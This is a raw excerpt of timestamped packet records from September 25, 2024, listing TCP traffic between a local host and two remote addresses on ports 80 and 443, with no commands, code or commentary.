                                                Sep 25, 2024 18:50:06.886183023 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886198044 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886217117 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886234999 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886239052 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886250019 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886265993 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886279106 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886298895 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886301041 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886315107 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886316061 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886332035 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886343956 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886360884 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886375904 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886392117 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886415958 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886415958 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886415958 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886434078 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886878014 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886941910 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886944056 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.886960983 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.886991024 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887005091 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887007952 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887023926 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887039900 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887051105 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887057066 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887072086 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887090921 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887104988 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887196064 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887211084 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887227058 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887240887 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887243032 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887259960 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887275934 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887291908 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887295008 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887295961 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887307882 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887295961 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887350082 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887350082 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887376070 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887789965 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887824059 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887839079 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887855053 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887866020 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887890100 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887897968 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887916088 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887932062 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887945890 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887949944 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.887960911 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887979031 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.887998104 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888088942 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888103008 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888118982 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888134003 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888150930 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888164997 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888183117 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888185024 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888185024 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888204098 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888206005 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888225079 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888259888 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888806105 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888823986 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888854027 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888868093 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888884068 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888900042 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888889074 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888919115 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.888889074 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888958931 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.888958931 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889024019 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889030933 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889048100 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889064074 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889079094 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889090061 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889095068 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889111996 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889113903 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889127970 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889146090 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889147997 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889157057 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889192104 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889445066 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889683008 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889739990 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:06.889944077 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:06.889944077 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.012940884 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.012979031 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.012996912 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013010979 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013027906 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013041973 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013067007 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013082981 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013092995 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013098955 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013113976 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013134003 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013134956 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013134956 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013149977 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013169050 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013175011 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013186932 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013190985 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013204098 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013209105 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013230085 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013257027 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013267994 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013283968 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013305902 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013313055 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013334036 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013382912 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013396978 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013412952 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013437033 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013453960 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013468981 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013514042 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013514042 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013514042 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013520002 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013560057 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013573885 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013576984 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013576984 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013608932 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013645887 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013660908 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013679981 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013689041 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013691902 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013709068 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013711929 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013725996 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013736010 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013742924 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013756037 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013762951 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013787985 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013881922 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013922930 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013926983 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013938904 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.013967991 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.013978958 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014007092 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014024019 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014039993 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014050007 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014055014 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014069080 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014070988 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014089108 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014102936 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014122963 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014192104 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014209032 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014225960 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014240026 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014256954 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014261961 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014278889 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014281034 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014296055 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014302969 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014321089 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014341116 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014400959 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014448881 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014453888 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014470100 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014498949 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014517069 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014524937 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014544010 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014559031 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014576912 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014588118 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014594078 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014602900 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014622927 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014637947 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014683008 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014698029 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014714003 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014725924 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014729023 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014741898 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014745951 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014760971 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014763117 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014775991 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014779091 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.014799118 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.014821053 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.015805006 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.018109083 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.018137932 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.018158913 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.018181086 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:07.018199921 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.018208981 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:07.018244028 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:11.609334946 CEST8049704104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:11.609414101 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:12.351721048 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:12.351769924 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:12.351847887 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:12.361363888 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:12.361397028 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:12.564260006 CEST4970480192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:12.956882000 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:12.956969023 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:12.961688995 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:12.961705923 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:12.962395906 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:12.978173018 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.023421049 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.242527008 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.242547989 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.242564917 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.242621899 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.242640972 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.242660999 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.242682934 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.263797045 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.263822079 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.263895035 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.263915062 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.263961077 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.309863091 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.309887886 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.309951067 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.309968948 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.309979916 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.310004950 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.349725962 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.349756956 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.349971056 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.349993944 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.350049019 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.350816965 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.350836039 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.350888968 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.350897074 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.350948095 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.352817059 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.352837086 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.352893114 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.352900028 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.352933884 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.416244984 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.416275024 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.416364908 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.416392088 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.416435003 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.436583996 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.436623096 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.436683893 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.436697960 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.436768055 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.437530041 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.437552929 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.437612057 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.437619925 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.437661886 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.438491106 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.438514948 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.438571930 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.438580990 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.438602924 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.438632965 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.439770937 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.439793110 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.439857006 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.439870119 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.439924002 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.440454006 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.440474033 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.440530062 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.440537930 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.440597057 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.462867022 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.462894917 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.462987900 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.463021040 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.463071108 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.502868891 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.502893925 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.502974987 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.502995968 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.503057957 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.503271103 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.503287077 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.503354073 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.503365040 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.503417969 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.523664951 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.523700953 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.523780107 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.523797035 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.523833036 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.524264097 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.524287939 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.524364948 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.524374008 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.524408102 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.524513006 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.524533987 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.524588108 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.524595976 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.524643898 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.525120974 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.525142908 CEST44349705207.241.227.240192.168.2.5
                                                Sep 25, 2024 18:50:13.525214911 CEST49705443192.168.2.5207.241.227.240
                                                Sep 25, 2024 18:50:13.525223970 CEST44349705207.241.227.240192.168.2.5
